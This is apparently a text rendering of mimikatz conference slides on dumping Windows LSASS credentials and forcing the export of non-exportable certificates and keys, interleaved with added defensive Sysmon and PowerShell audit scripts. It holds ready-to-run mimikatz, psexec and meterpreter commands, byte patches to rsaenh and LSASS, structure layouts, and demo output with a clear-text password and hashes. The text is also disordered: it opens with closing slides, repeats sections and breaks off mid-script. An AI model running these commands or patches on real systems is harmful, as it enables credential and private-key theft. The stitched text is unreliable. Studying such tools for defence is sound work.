psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password
– PFX files are protected by this password: mimikatz
Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
mimikatz :: crypto :: what we can do

Exactly the same as for sekurlsa: it will prevent access to accounts/computers
– no admin, no admin, no admin…
Basics
– Use smartcards/tokens for user certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementation (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy :)
mimikatz :: what else can it do?

Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List Notifications (process, thread, image, registry)
– List Objects hooks and procedures
– …
…
mimikatz :: that's all folks!

Thanks to:
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
– Microsoft for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, …
– You, for your attention
Questions?
Don't be shy :)
especially if you have written the corresponding slide number
Blog, Source Code & Contact

blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz :: sekurlsa :: kerberos

Let's login (normal account)
After credentials protection, KerbCreateLogonSession calls
– NT6: KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
– NT5: KerbInsertLogonSession to insert data in KerbLogonSessionList

[Call stacks from the diagram, innermost frame first]
lsasrv!LsaProtectMemory ← kerberos!KerbHideKey ← kerberos!KerbCreatePrimaryCredentials ← kerberos!KerbCreateLogonSession ← kerberos!SpAcceptCredentials
lsasrv!LsaProtectMemory ← kerberos!KerbHidePassword ← kerberos!KerbCreateLogonSession ← kerberos!SpAcceptCredentials
lsasrv!LsaProtectMemory ← msv1_0!NlpAddPrimaryCredential ← msv1_0!SspAcceptCredentials ← msv1_0!SpAcceptCredentials
lsasrv!LsaProtectMemory ← wdigest!SpAcceptCredentials
lsasrv!LsaProtectMemory ← tspkg!TSHidePassword ← tspkg!SpAcceptCredentials
Annotations on the diagram: "Kerberos part for password", "Kerberos ticket part? Maybe :)"
mimikatz :: sekurlsa :: kerberos (nt6) :: workflow

[Diagram: LsaEnumerateLogonSessions → for each LUID → RtlLookupElementGenericTableAvl on kerberos!KerbGlobalLogonSessionTable → KIWI_KERBEROS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear]

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
	DWORD unk0;
	PVOID unk1;
	PVOID unk2;
	PVOID unk3;
#ifdef _M_X64
	BYTE unk4[32];
#elif defined _M_IX86
	BYTE unk4[20];
#endif
	LUID LocallyUniqueIdentifier;
#ifdef _M_X64
	BYTE unk5[44];
#elif defined _M_IX86
	BYTE unk5[36];
#endif
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa :: kerberos (nt5) :: workflow

[Diagram: LsaEnumerateLogonSessions → for each LUID → search the kerberos!KerbLogonSessionList linked list for the LUID → KIWI_KERBEROS_LOGON_SESSION → LsaUnprotectMemory → password in clear]

typedef struct _KIWI_KERBEROS_LOGON_SESSION {
	struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
	struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
	DWORD UsageCount;
	PVOID unk0;
	PVOID unk1;
	PVOID unk2;
	DWORD unk3;
	DWORD unk4;
	PVOID unk5;
	PVOID unk6;
	PVOID unk7;
	LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
	DWORD unk8;
#endif
	DWORD unk9;
	DWORD unk10;
	PVOID unk11;
	DWORD unk12;
	DWORD unk13;
	PVOID unk14;
	PVOID unk15;
	PVOID unk16;
	[…]
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz :: sekurlsa :: demo time

Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos :: "huh?"

Ok, it works…
But why?
Not for all logons on NT5 (can need an unlock)
From my understanding of Microsoft's explanations:
– no need of passwords for the Kerberos protocol…
– all is based on the hash (not very sexy either)
Microsoft's implementation of Kerberos is full of logic…
– For password auth
  • password hash for the shared secret, but keeping the password in memory
– For full smartcard auth
  • No password on client
  • No hash on client
    – NTLM hash on client…
    – the KDC sends it back as a gift
mimikatz :: sekurlsa

All passwords in memory are encrypted, but in a reversible way, to be usable
We used LsaUnprotectMemory in the LSASS context to decrypt them
– This function relies on LsaEncryptMemory from lsasrv.dll
For that, we previously injected a DLL (sekurlsa.dll) in the LSASS process to take benefit of its keys when we called it
Can it be fun to decrypt outside the process?
– Yes it is… no more injection, just reading the memory of the LSASS process…
mimikatz can use lsasrv.dll too, and "imports" the keys LSASS initialized
– When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we have the same behaviour as when we are in LSASS
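The two approaches above, injecting a DLL into LSASS versus only reading its memory from outside, need different process access rights, and that difference is what a host sensor records. The following is an added example, not code from the slides or from mimikatz: it parses the "Key: Value" message form that Sysmon's "Process accessed" event (Event ID 10) renders, keeps the records whose TargetImage is lsass.exe, and says whether the GrantedAccess mask is enough to inject (create thread, allocate and write memory) or only to read. The four records, the image paths and the call traces are constructed for the example; the PROCESS_* values are the Win32 constants.

```python
"""Classify Sysmon "Process accessed" (Event ID 10) records that target lsass.exe.

Added example, not code from the slides or from mimikatz. Injecting a DLL
into LSASS and merely reading its memory need different process access
rights; Sysmon records the rights a handle was opened with as GrantedAccess.
This parses the "Key: Value" message form Sysmon renders and reports which
capability each handle to lsass.exe carries. Records are constructed;
image paths and call traces are made up.
"""

# PROCESS_* access rights from the Win32 headers (winnt.h).
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

# Remote DLL injection must allocate, write and start a thread in the target;
# reading secrets out of memory needs only VM_READ (plus a query right).
INJECT_RIGHTS = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE
READ_RIGHTS = PROCESS_VM_READ

# Constructed Sysmon Event 10 messages: a benign query, a memory reader,
# an injector, and the same injector opening a process that is not LSASS.
SAMPLE_MESSAGES = [
    "Process accessed:\n"
    "SourceImage: C:\\Windows\\System32\\wbem\\WmiPrvSE.exe\n"
    "TargetImage: C:\\Windows\\System32\\lsass.exe\n"
    "GrantedAccess: 0x1400\n"
    "CallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+9c5a4\n",
    "Process accessed:\n"
    "SourceImage: C:\\Users\\alice\\Desktop\\dumper.exe\n"
    "TargetImage: C:\\Windows\\System32\\lsass.exe\n"
    "GrantedAccess: 0x1010\n"
    "CallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+9c5a4\n",
    "Process accessed:\n"
    "SourceImage: C:\\Users\\alice\\Desktop\\injector.exe\n"
    "TargetImage: C:\\Windows\\System32\\lsass.exe\n"
    "GrantedAccess: 0x1F3FFF\n"
    "CallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+9c5a4\n",
    "Process accessed:\n"
    "SourceImage: C:\\Users\\alice\\Desktop\\injector.exe\n"
    "TargetImage: C:\\Windows\\System32\\notepad.exe\n"
    "GrantedAccess: 0x1F3FFF\n"
    "CallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+9c5a4\n",
]


def parse_sysmon_message(text):
    """Turn the rendered 'Key: Value' lines (after the title line) into a dict."""
    rec = {}
    for line in text.splitlines()[1:]:
        key, sep, value = line.partition(":")
        if sep:
            rec[key.strip()] = value.strip()
    return rec


def classify_access(mask):
    """Capabilities a handle with this access mask grants over the target."""
    caps = []
    if mask & INJECT_RIGHTS == INJECT_RIGHTS:   # all three injection rights present
        caps.append("inject")
    if mask & READ_RIGHTS:
        caps.append("read")
    return caps


def triage_lsass_access(messages):
    """Records whose target is lsass.exe and whose mask allows injection or reading."""
    findings = []
    for text in messages:
        rec = parse_sysmon_message(text)
        if not rec.get("TargetImage", "").lower().endswith("\\lsass.exe"):
            continue
        caps = classify_access(int(rec["GrantedAccess"], 16))
        if caps:
            findings.append({"source": rec["SourceImage"],
                             "granted": rec["GrantedAccess"],
                             "capabilities": caps})
    return findings


if __name__ == "__main__":
    for f in triage_lsass_access(SAMPLE_MESSAGES):
        print(f'{f["source"]} opened lsass.exe with {f["granted"]}: {", ".join(f["capabilities"])}')
```

Masks that carry only query rights (the first record) are routine from system components and are filtered out; the read-only case is the one the slides describe as "no more injection, just reading memory", so a sensor that alerts only on injection rights misses it.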
mimikatz :: sekurlsa :: LsaEncryptMemory :: NT5

Depending on the size of the secret, LsaEncryptMemory uses
– RC4
– DESx

[Diagram: key material held by lsasrv inside lsass: g_cbRandomKey (DWORD, 256), g_pRandomKey (BYTE[g_cbRandomKey]), g_pDESXKey (BYTE[144]), g_Feedback (BYTE[8]); mimikatz loads its own copy of lsasrv and copies these values over from the LSASS process…]
mimikatz :: sekurlsa :: LsaEncryptMemory :: NT6

Depending on the size of the secret, LsaEncryptMemory uses
– 3DES
– AES

[Diagram: key material held by lsasrv inside lsass: InitializationVector (BYTE[16]), h3DesKey and hAesKey (each a PKIWI_BCRYPT_KEY whose cle member points at a KIWI_BCRYPT_KEY_DATA holding the key bytes); mimikatz copies these over from the LSASS process…]

typedef struct _KIWI_BCRYPT_KEY_DATA {
	DWORD size;
	DWORD tag;
	DWORD type;
	DWORD unk0;
	DWORD unk1;
	DWORD unk2;
	DWORD unk3;
	PVOID unk4;
	BYTE data; /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
	DWORD size;
	DWORD type;
	PVOID unk0;
	PKIWI_BCRYPT_KEY_DATA cle;
	PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz :: sekurlsa :: memo

Security Packages
Package          Symbols                                                  Type
tspkg            tspkg!TSGlobalCredTable                                  RTL_AVL_TABLE
wdigest          wdigest!l_LogSessList                                    LIST_ENTRY
livessp          livessp!LiveGlobalLogonSessionList                       LIST_ENTRY
kerberos (nt5)   kerberos!KerbLogonSessionList                            LIST_ENTRY
kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable                     RTL_AVL_TABLE
msv1_0           lsasrv!LogonSessionList, lsasrv!LogonSessionListCount    LIST_ENTRY, ULONG

Protection Keys
Key     NT 5 Symbols                                  NT 6 Symbols
IV      –                                             lsasrv!InitializationVector
RC4     lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey     –
DESx    lsasrv!g_pDESXKey, lsasrv!g_Feedback          –
3DES    –                                             lsasrv!h3DesKey
AES     –                                             lsasrv!hAesKey
mimikatz :: sekurlsa :: memo

Some commands
mimikatz privilege::debug sekurlsa::logonPasswords full exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit
meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

mimikatz 1.0 x64 (RC) Traitement du Kiwi (Aug 2 2012 01:32:28) http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full
Authentification Id : 0;234870
Package d'authentification : NTLM
Utilisateur principal : Gentil Kiwi
Domaine d'authentification : vm-w8-rp-x
	msv1_0 :
	 * Utilisateur : Gentil Kiwi
	 * Domaine : vm-w8-rp-x
	 * Hash LM : d0e9aee149655a6075e4540af1f22d3b
	 * Hash NTLM : cc36cf7a8514893efccd332446158b1a
	kerberos :
	 * Utilisateur : Gentil Kiwi
	 * Domaine : vm-w8-rp-x
	 * Mot de passe : waza1234
	wdigest :
	 * Utilisateur : Gentil Kiwi
	 * Domaine : vm-w8-rp-x
	 * Mot de passe : waza1234
	tspkg :
	 * Utilisateur : Gentil Kiwi
	 * Domaine : vm-w8-rp-x
	 * Mot de passe : waza1234
	livessp :
	 n.t. (LUID KO)
mimikatz :: sekurlsa :: what we can do?

Basics
– No physical access to the computer (the first step to pass the hash, then pass the pass)
– No admin rights / system rights / debug privileges (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless ;))
– For privileged accounts, network logon instead of interactive (when possible)
– Audit: pass the hash keeps traces and can lock accounts
– No admin rights / system rights / debug privileges, even for VIPs
– Use a separate network (or forest) for privileged tasks

More in depth
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– Nothing exotic
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign on
– Stop shared secrets for authentication, push public/private stuff (like keys ;))
– Leave yourself room to drop backward compatibility
– Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
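As an added example (not from the talk), a read-only PowerShell audit of the LSASS settings behind that list: which security packages are loaded, whether WDigest keeps a clear-text password, the NTLM restriction policies, and who holds SeDebugPrivilege. The registry paths and value names are the documented Windows ones as I know them, not values from the slides, and the UseLogonCredential value only exists on systems with the later WDigest update (Windows 8.1 / 2012 R2, or KB2871997 on older ones).

```powershell
# Added example, not from the talk: read-only audit of the LSASS settings that the
# "what we can do" list asks for. Run from an elevated shell so secedit can export policy.

function Get-LsaHardeningReport {
    [CmdletBinding()]
    param()

    $lsa     = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $msv     = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'
    $wdigest = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'

    # Packages the demo output shows holding a reversible or clear-text password in LSASS.
    $clearTextPackages = @('wdigest', 'tspkg', 'livessp')
    $findings = New-Object System.Collections.Generic.List[object]

    function Add-Finding($Check, $Value, $Status, $Note) {
        $findings.Add([pscustomobject]@{ Check = $Check; Value = $Value; Status = $Status; Note = $Note })
    }
    function Get-RegValue($Path, $Name) {
        $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
        if ($null -eq $item) { return $null }
        return $item.$Name
    }
    function ValueOrNotSet($Value) { if ($null -eq $Value) { 'not set' } else { $Value } }

    # 1. SSPs loaded by LSASS at boot (REG_MULTI_SZ "Security Packages").
    foreach ($pkg in @(Get-RegValue $lsa 'Security Packages')) {
        $name = "$pkg".Trim().ToLowerInvariant()
        if (-not $name) { continue }
        if ($clearTextPackages -contains $name) {
            Add-Finding "Security package: $name" 'loaded' 'REVIEW' 'keeps a reversible/clear-text password in LSASS; drop it if nothing uses it'
        } elseif (@('kerberos', 'msv1_0') -contains $name) {
            Add-Finding "Security package: $name" 'loaded' 'INFO' 'cannot be removed; the controls below limit what it gives away'
        } else {
            Add-Finding "Security package: $name" 'loaded' 'INFO' 'not one of the packages the talk singles out'
        }
    }

    # 2. WDigest: UseLogonCredential = 0 stops the clear-text password shown under "wdigest".
    #    When the value is absent the default depends on OS and update level (KB2871997).
    $ulc = Get-RegValue $wdigest 'UseLogonCredential'
    $status = if ($null -eq $ulc) { 'REVIEW' } elseif ([int]$ulc -eq 0) { 'OK' } else { 'FAIL' }
    Add-Finding 'WDigest UseLogonCredential' (ValueOrNotSet $ulc) $status '0 = no clear-text password kept; set it explicitly rather than trusting the default'

    # 3. NTLM: the "Disable NTLM (available with NT6)" item. 2 = deny, 1 = audit only.
    foreach ($name in @('RestrictSendingNTLMTraffic', 'RestrictReceivingNTLMTraffic')) {
        $v = Get-RegValue $msv $name
        $status = if ($v -eq 2) { 'OK' } elseif ($v -eq 1) { 'AUDIT' } else { 'REVIEW' }
        Add-Finding "NTLM: $name" (ValueOrNotSet $v) $status '0/unset = allow, 1 = audit, 2 = deny'
    }
    $lvl = Get-RegValue $lsa 'LmCompatibilityLevel'
    $status = if ($lvl -ge 5) { 'OK' } else { 'REVIEW' }
    Add-Finding 'LmCompatibilityLevel' (ValueOrNotSet $lvl) $status '5 = NTLMv2 only, LM and NTLMv1 responses refused'

    # 4. SeDebugPrivilege: privilege::debug in the demo needs it. secedit lists the holders under
    #    [Privilege Rights]; a missing SeDebugPrivilege line means nobody holds it.
    $inf = Join-Path $env:TEMP ('lsa-audit-{0}.inf' -f [guid]::NewGuid())
    try {
        & secedit.exe /export /cfg $inf /areas USER_RIGHTS /quiet | Out-Null
        if (Test-Path $inf) {
            $line = Get-Content $inf | Where-Object { $_ -match '^SeDebugPrivilege\s*=' }
            $holders = if ($line) { ($line -split '=', 2)[1].Trim() } else { 'nobody' }
            $status  = if ($holders -eq 'nobody') { 'OK' } else { 'REVIEW' }
            Add-Finding 'SeDebugPrivilege holders' $holders $status 'these SIDs can open LSASS with full access; *S-1-5-32-544 is Administrators'
        } else {
            Add-Finding 'SeDebugPrivilege holders' 'unknown' 'REVIEW' 'secedit export failed; run from an elevated shell'
        }
    } finally {
        Remove-Item $inf -ErrorAction SilentlyContinue
    }

    return $findings
}

# Usage: every FAIL or REVIEW row is one of the items on the slide above.
Get-LsaHardeningReport | Format-Table -AutoSize -Wrap
```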
mimikatz :: crypto :: what is it?

A little module that I wrote to
– play with Windows Cryptographic API, CNG and RSA keys
– automate export of certificates/keys
  • Even those which are "not" exportable

What the crypto module can do
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public, in DER format
    – with private keys, in PFX format
  • Private keys in PVK format – it's cool, OpenSSL can deal with it too
– Patch
  • CryptoAPI in mimikatz context
  • CNG in LSASS context (again ;))
mod_mimikatz_crypto
mimikatz :: crypto :: how it's protected?

Private keys are DPAPI protected
– You cannot reuse private key files on another computer
  • At least not without the master keys and/or passwords of the users
Computer/User can load their own keys because they have enough secrets to do it (e.g. an opened session)
– Yes, a computer/server opens a "session"
Export/Usage can be limited by
– Password
– Popup
– Export/Archive flag not present
(Password / Popup: a constraint for most users; unavailable for computer keys)

  certutil -importpfx mycert.p12 NoExport
  certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi :: how it works?

"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware." – http://technet.microsoft.com/library/cc962093.aspx

Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with different cryptographic stuff: CSPs (keys), smartcard readers, …
– cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
mimikatz :: crypto :: capi :: how it's exported? ( level)

[Diagram: the Process asks CryptoAPI / the RSA CSP to export a key; the CSP loads the private key (DPAPI decode, "PLAYSKOOL") and checks the Exportable flag: yes → Exported Key; no → NTE_BAD_KEY_STATE. Everything happens inside the process.]
mimikatz :: crypto :: patch capi :: because I own my process

When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey
This function does all the work to prepare the export and checks whether the key is exportable
  mimikatz # crypto::exportCertificates
  Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
   - Benjamin Delpy
          Container Clé  : 470ADFBA-8718-4014-B05E-B30776B75A03
          Provider       : Microsoft Enhanced Cryptographic Provider v1.0
          Type           : AT_KEYEXCHANGE
          Exportabilité  : NON
          Taille clé     : 2048
          Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
          Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

  ================ Certificat 0 ================
  Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
  Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
  Objet : CN=Benjamin Delpy, C=FR
  Il ne s'agit pas d'un certificat racine
  Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
    Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
    Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
  La clé privée NE PEUT PAS être exportée
  Succès du test de cryptage
  CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
  CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

(Slide callout: "Exportable?")
mimikatz :: crypto :: patch capi :: because I own my process

So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space
  .text:0AC0B7CB  0F 85 33 C7 FF FF   jnz  continue_key_export_or_archive
  .text:0AC0B7CB  90                  nop
  .text:0AC0B7CC  E9 33 C7 FF FF      jmp  continue_key_export_or_archive

  .text:0AC1F749  0F 85 B6 3B FF FF   jnz  continue_key_export_or_archive_prepare
  .text:0AC1F749  90                  nop
  .text:0AC1F74A  E9 B6 3B FF FF      jmp  continue_key_export_or_archive_prepare
mimikatz :: crypto :: patch capi :: demo time

Import, export, import as not exportable… export
mimikatz :: crypto :: patch capi :: limitations

Because
– I'm lazy
– In the majority of cases I've seen RSA keys in real-life use
  • Elliptic Curve, a little…

mimikatz crypto::patchcapi only deals with
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz :: crypto :: cng :: how it works?

"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx

"To comply with Common Criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."

This time, key operations are not made in the "user" process context
Processes use RPC to call "Key isolation service" (keyiso) functions
It seems more secure than CryptoAPI…
– It is, but it's not perfect…
mimikatz :: crypto :: cng :: how it's exported? ( level)

[Diagram: the Process asks CNG to export a key; the request goes over RPC to the KeyIso Service (LSASS process), which loads the private key (DPAPI decode, "PLAYSKOOL") and checks the Exportable flag: yes → Exported Key; no → NTE_NOT_SUPPORTED. On NT6, LSASS is a system protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP.]
mimikatz :: crypto :: patch cng :: because sometimes I own LSASS

When we want to export a certificate with its private key (or only the key), the RPC calls lead to lsass (keyiso) ncrypt!SPCryptExportKey
This function does all the work to prepare the export and checks whether the key is exportable
  mimikatz # crypto::exportKeys [user]
  Clés CNG :
   - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
          Exportabilité  : NON
          Taille clé     : 2048
          Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
          mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK (0x80090029) L'opération demandée n'est pas prise en charge.

(Slide callout: "Exportable?")
mimikatz :: crypto :: patch cng :: because sometimes I own LSASS

This time, the checks and the keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…
  .text:6C815210  75 1C   jnz  short continue_key_export
  .text:6C815210  EB 1C   jmp  short continue_key_export
mimikatz :: crypto :: patch cng :: demo time

Import, export, import as not exportable… export again
mimikatz :: crypto :: patch cng :: limitations

The patch operation needs some privileges
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu?)
– certutil can…
mimikatz :: crypto :: patch cng :: bonus

After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for an export can work too
– Yeah, like the good old certutil
  C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
  ================ Certificat 1 ================
  […]
  Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
    Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
    Fournisseur = Microsoft Software Key Storage Provider
  La clé privée NE PEUT PAS être exportée
  Succès du test de chiffrement
  CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
  CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

  C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
  ================ Certificat 1 ================
  […]
  Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
    Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
    Fournisseur = Microsoft Software Key Storage Provider
  Succès du test de chiffrement
  CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz :: crypto :: memo

Some commands:

  mimikatz # crypto::patchcapi
  mimikatz # crypto::exportCertificates
  mimikatz # exit

  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit

  mimikatz # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"

  mimikatz # privilege::debug
  mimikatz # crypto::patchcng
  mimikatz # crypto::patchcapi
  mimikatz # crypto::exportCertificates
  mimikatz # crypto::exportKeys
  mimikatz # exit

Password
– PFX files are protected by this password: mimikatz
Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
mimikatz :: crypto :: what we can do?

Exactly the same as for sekurlsa: it will prevent access to accounts/computers
– no admin, no admin, no admin…
Basics
– Use smartcards/tokens for user certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with the TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendor implementations (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
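As an added example (not from the talk and not mimikatz code), a read-only PowerShell inventory that ties the "how it's protected" slide to this one: for each certificate with a private key it reports the API serving the key (CryptoAPI or CNG), the provider and the export policy, so you can see which keys still sit in software (process or LSASS memory, the cases the patch capi and patch cng slides cover) versus in a smart card or TPM. The grouping of provider names into "software" and "hardware" is my assumption, as are the .NET accessors used.

```powershell
# Added example, not from the talk or from mimikatz: inventory of certificate private keys,
# their provider and their export policy. Read-only: nothing is exported or modified.

function Get-PrivateKeyProtectionReport {
    [CmdletBinding()]
    param([string[]]$StorePath = @('Cert:\CurrentUser\My', 'Cert:\LocalMachine\My'))

    # rsaenh.dll CSPs (the list on the patch capi limitations slide) plus the software KSP:
    # the private key is decrypted into the calling process or into LSASS (keyiso).
    $softwareProviders = @(
        'Microsoft Base Cryptographic Provider v1.0',
        'Microsoft Enhanced Cryptographic Provider v1.0',
        'Microsoft Enhanced RSA and AES Cryptographic Provider',
        'Microsoft RSA SChannel Cryptographic Provider',
        'Microsoft Strong Cryptographic Provider',
        'Microsoft Software Key Storage Provider'
    )
    # Built-in TPM and smart card KSPs (assumed names): the key never leaves the hardware.
    $hardwareProviders = @('Microsoft Platform Crypto Provider', 'Microsoft Smart Card Key Storage Provider')

    foreach ($path in $StorePath) {
        $certs = Get-ChildItem -Path $path -ErrorAction SilentlyContinue | Where-Object { $_.HasPrivateKey }
        foreach ($cert in $certs) {
            $api = 'unknown'; $provider = $null; $exportable = $null; $plaintext = $null
            $rsa = $null
            try {
                # .NET 4.6+: RSACng for KSP keys, RSACryptoServiceProvider for CSP keys.
                $rsa = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]::GetRSAPrivateKey($cert)
            } catch { }
            if ($null -eq $rsa) { try { $rsa = $cert.PrivateKey } catch { } }   # older .NET, CSP keys only

            # Type names are compared as strings so the script still parses where RSACng does not exist.
            if ($rsa -and $rsa.GetType().Name -eq 'RSACng') {
                $api        = 'CNG'
                $provider   = $rsa.Key.Provider.Provider
                $policy     = [int]$rsa.Key.ExportPolicy     # CngExportPolicies flags
                $exportable = ($policy -band 1) -ne 0        # AllowExport
                $plaintext  = ($policy -band 2) -ne 0        # AllowPlaintextExport
            } elseif ($rsa -and $rsa.GetType().Name -eq 'RSACryptoServiceProvider') {
                $api        = 'CryptoAPI'
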